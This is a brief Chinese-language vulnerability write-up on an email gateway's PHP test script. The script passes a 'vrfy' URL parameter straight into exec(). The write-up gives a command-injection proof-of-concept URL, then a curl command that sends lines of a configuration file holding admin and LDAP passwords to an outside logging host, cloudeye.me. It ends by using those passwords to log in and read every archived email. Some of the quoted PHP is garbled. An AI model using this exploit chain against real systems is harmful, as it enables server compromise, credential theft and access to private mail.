使用 $file = (isset($_GET["file"]) ? $_GET["file"] : $ini_default); $debugFile = "/tmp/vrfy-test.err";$cmd = $GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n $vrfy -d 2> debugFile"; exec($cmd, $output, $ret); $lines = @file($debugFile); URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd; 的方式可以利用该漏洞执行命令(nobody权限)。 排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。 构造以下sed命令(通过sed命令读取目标文件单行内容): curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini), 通过查阅远端服务器(例如cloudeye.me)的web日志信息, 回显获取到default.ini文件内容,得到邮件归档管理员admin的口令或者配置的ldap密码,访问 $ip/report/login.php 登陆查阅全部邮件内容。